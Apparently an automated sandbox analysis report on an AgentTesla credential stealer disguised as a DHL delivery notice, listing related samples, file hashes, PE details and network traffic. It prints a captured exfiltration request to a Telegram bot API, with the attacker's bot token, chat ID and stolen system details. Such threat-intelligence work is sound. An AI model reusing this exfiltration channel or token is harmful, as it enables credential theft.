                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    15:10:53API Interceptor1x Sleep call for process: Dhl recent package delivery report needs attention.exe modified
                                    15:11:00API Interceptor749x Sleep call for process: vbc.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    149.154.167.220S.O.A18052022.exeGet hashmaliciousBrowse
                                      e3.exeGet hashmaliciousBrowse
                                        d5.exeGet hashmaliciousBrowse
                                          TransactionAdviceDetailsReport-20220513-091440.exeGet hashmaliciousBrowse
                                            NN doc,TT Swift Copy.exeGet hashmaliciousBrowse
                                              SHIPPING DETAILS.PIF.EXEGet hashmaliciousBrowse
                                                Updatedcontract051222.exeGet hashmaliciousBrowse
                                                  Halkbank_Ekstre_20220512_082357_541079.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.W32.AIDetect.malware2.8516.exeGet hashmaliciousBrowse
                                                      Angebot Nr. 58022.xlsxGet hashmaliciousBrowse
                                                        doc_65398086_4190362045539.pdf.vbsGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Lazy.178938.10008.exeGet hashmaliciousBrowse
                                                            VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exeGet hashmaliciousBrowse
                                                              TNT AWB.exeGet hashmaliciousBrowse
                                                                T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousBrowse
                                                                  TransactionAdviceDetailsReport-20220512-091440.pdf.exeGet hashmaliciousBrowse
                                                                    4BDAd47i.txt.cmdGet hashmaliciousBrowse
                                                                      Elden Ring Installer.exeGet hashmaliciousBrowse
                                                                        Transferencia.exeGet hashmaliciousBrowse
                                                                          Orden de compra .exeGet hashmaliciousBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            api.telegram.orgS.O.A18052022.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Bank TT slip.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SOA.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            e3.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            d5.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            TransactionAdviceDetailsReport-20220513-091440.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            NN doc,TT Swift Copy.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SHIPPING DETAILS.PIF.EXEGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Updatedcontract051222.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Order_List.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Halkbank_Ekstre_20220512_082357_541079.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            soa.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.W32.AIDetect.malware2.8516.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Angebot Nr. 58022.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            doc_65398086_4190362045539.pdf.vbsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Variant.Lazy.178938.10008.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Mvmsrl 0512-22021.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            TNT AWB.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            TELEGRAMRUS.O.A18052022.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            https://telegra.ph/Invoice-05-13Get hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            e3.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            d5.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            TransactionAdviceDetailsReport-20220513-091440.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            NN doc,TT Swift Copy.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SHIPPING DETAILS.PIF.EXEGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Updatedcontract051222.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Halkbank_Ekstre_20220512_082357_541079.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.W32.AIDetect.malware2.8516.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Angebot Nr. 58022.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            doc_65398086_4190362045539.pdf.vbsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Variant.Jaik.72893.16950.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            SecuriteInfo.com.Variant.Lazy.178938.10008.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            YzZvXNPftX.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            BJgh7q8C66.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            Kaufvertrag.lnkGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            TNT AWB.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            9vfBClHPAP.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0e7ECCDD2DFBA647FAC22066819DC893C1CB467252A2381.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Shipping Details.PIF.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            RFQ. 220 & Drawings.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            S.O.A18052022.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Zadaca3RPR.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            n2vBPxeTmB.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            https://ipfs.io/ipfs/QmUn5FAzssu1Q4Q5X6EJxkCNUADLuB5NcLV5kQeJbdrvB8?key=84f132305c07d7ed00df4ca65f2d815b&redirect=https://www.amazon.comGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            @NorthBearStation-454eeabe-4b02-4cc3-bad6-94eefdbe6030.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            https://1drv.ms/u/s!AjqXvdUL1pFHig77Jv0vSMtrWnBP?e=CouTYeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            gayporn.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Syhwdgsr.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            854F1E97-5DBB-4A87-A566-33D9012B05E3.pdf.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.htmlGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            e3.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            d5.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            DENUNCIA IMPUESTA EN SU CONTRA.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            https://cremodom.cf/mansion/#talia.bleakley@foster-gamko.comGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            TransactionAdviceDetailsReport-20220513-091440.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            https://sync.crwdcntrl.net/map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=62553350917825036762023184708005776201?https%3A%2F%2Fsign-smpu724eb7r29qzs1gw162nd2cilb0gppxkyfq3q1rk.website%E2%80%8B.yandexcloud.net%23dbrodie@standrew.co.ukGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            https://tmsteels.dotling.com/Get hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            No context
                                                                            Process:C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):805
                                                                            Entropy (8bit):5.360596073797118
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhk:MIHK5HKXE1qHmAHKzvRYHKhQnok
                                                                            MD5:366792B833C0D8969A74B40FBB71B7D8
                                                                            SHA1:404610028972C443AD98E00455F03037D022DCA9
                                                                            SHA-256:653326591133197ACF3B973C5EF35C4373D7BC8ED9D143E02DDC26C48CD65723
                                                                            SHA-512:8DBBBF083738332F7DE278C6CEF1010F3FBFA5509B18EDD0B6A1D1950EC3DF5FE9B0298ED1AE09A08500CEF0264F9028880CC38B8C9DA81EAD0314B7FBFD6F02
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):6.275416787941844
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:Dhl recent package delivery report needs attention.exe
                                                                            File size:550400
                                                                            MD5:163d3bc2c523dc10c959474aa3f69d56
                                                                            SHA1:5338e0aaea69b582d22ff624b4a9fd4efc9eb707
                                                                            SHA256:1040411f26f6464fb485e92e74c08c559a6feb9bed0eadc44e831a08c80e8a01
                                                                            SHA512:675538d727c564fc80a42b868a4025105ae8c4df10da5e5df0aa93c95be608ff9f89e5b35a366fba6f2a5aac703aca46a9d5c76978a160b64824b8b09527c5c1
                                                                            SSDEEP:6144:PEmVKcUXWckAJnwNtuOeB2d/t8CdZy9QD/EsQYhT6qphrf5mAz2:MmTUGvxeBJCd5DMTbqz5Dz
                                                                            TLSH:1AC49E1D638F0FD1D36A063D82A19654C238EE15C886F70F78C02BB6E9363D79961B67
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.}b............................g.... ........@.. ....................................@................................
                                                                            Icon Hash:9aa3a38a8383929a
                                                                            Entrypoint:0x45ec67
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x627DB860 [Fri May 13 01:46:08 2022 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5ec1d0x4a.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x2926c.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000x5cc6d0x5ce00False0.763629815781data7.52092762283IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x600000x2926c0x29400False0.0292850378788data1.62115337498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0x600ac0x10828dBase III DBT, version number 0, next free block index 40
                                                                            RT_ICON0x708f80x25a8dBase III DBT, version number 0, next free block index 40
                                                                            RT_ICON0x72ec40x10a8data
                                                                            RT_ICON0x73f900x468GLS_BINARY_LSB_FIRST
                                                                            RT_ICON0x7441c0x10828dBase III DBT, version number 0, next free block index 40
                                                                            RT_ICON0x84c680x25a8dBase III DBT, version number 0, next free block index 40
                                                                            RT_ICON0x872340x10a8data
                                                                            RT_ICON0x883000x468GLS_BINARY_LSB_FIRST
                                                                            RT_DIALOG0x887a40x11cdata
                                                                            RT_GROUP_ICON0x889260x3edata
                                                                            RT_GROUP_ICON0x889b00x3edata
                                                                            RT_VERSION0x88a2a0x60cdata
                                                                            RT_MANIFEST0x890720x1faXML 1.0 document, ASCII text, with very long lines, with no line terminators
                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain
                                                                            DescriptionData
                                                                            Translation0x0409 0x04e4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 14, 2022 15:11:12.245178938 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.245270014 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.245419979 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.278245926 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.278285980 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.339421034 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.339623928 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.343590021 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.343640089 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.343913078 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.552504063 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.552637100 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.754854918 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.787767887 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.791682959 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.832510948 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.906265974 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.906373024 CEST44349770149.154.167.220192.168.2.6
                                                                            May 14, 2022 15:11:12.906445026 CEST49770443192.168.2.6149.154.167.220
                                                                            May 14, 2022 15:11:12.908200979 CEST49770443192.168.2.6149.154.167.220
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 14, 2022 15:11:12.166580915 CEST6035053192.168.2.68.8.8.8
                                                                            May 14, 2022 15:11:12.184549093 CEST53603508.8.8.8192.168.2.6
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            May 14, 2022 15:11:12.166580915 CEST192.168.2.68.8.8.80x81ffStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            May 14, 2022 15:11:12.184549093 CEST8.8.8.8192.168.2.60x81ffNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                            • api.telegram.org
                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.649770149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2022-05-14 13:11:12 UTC0OUTPOST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1007
                                                                            Expect: 100-continue
                                                                            Connection: Keep-Alive
                                                                            2022-05-14 13:11:12 UTC0INHTTP/1.1 100 Continue
                                                                            2022-05-14 13:11:12 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 32 33 31 39 38 31 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 34 33 36 39 38 32 31 37 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 32 33 31 39 38 31 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 32 38 34 39 39 32 0a 4f 53 46
                                                                            Data Ascii: -----------------------------8da35bf231981d6Content-Disposition: form-data; name="chat_id"1436982177-----------------------------8da35bf231981d6Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/284992OSF
                                                                            2022-05-14 13:11:12 UTC1INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Sat, 14 May 2022 13:11:12 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 631
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            {"ok":true,"result":{"message_id":5078,"from":{"id":5279095555,"is_bot":true,"first_name":"boxxyp","username":"boxxypbot"},"chat":{"id":1436982177,"first_name":"Boxxy","last_name":"P","username":"boxxypp","type":"private"},"date":1652533872,"document":{"file_name":"user-284992 2022-05-14 03-33-27.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIT1mJ_qnCzOjFwD6ifMyNDB4pELbX9AAKMCgAC-U8AAVBDCA9F3VY0SCQE","file_unique_id":"AgADjAoAAvlPAAFQ","file_size":431},"caption":"New PW Recovered!\n\nUser Name: user/284992\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:1
                                                                            Start time:15:10:50
                                                                            Start date:14/05/2022
                                                                            Path:C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe"
                                                                            Imagebase:0x1e0000
                                                                            File size:550400 bytes
                                                                            MD5 hash:163D3BC2C523DC10C959474AA3F69D56
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Target ID:2
                                                                            Start time:15:10:54
                                                                            Start date:14/05/2022
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                            Imagebase:0x930000
                                                                            File size:2688096 bytes
                                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
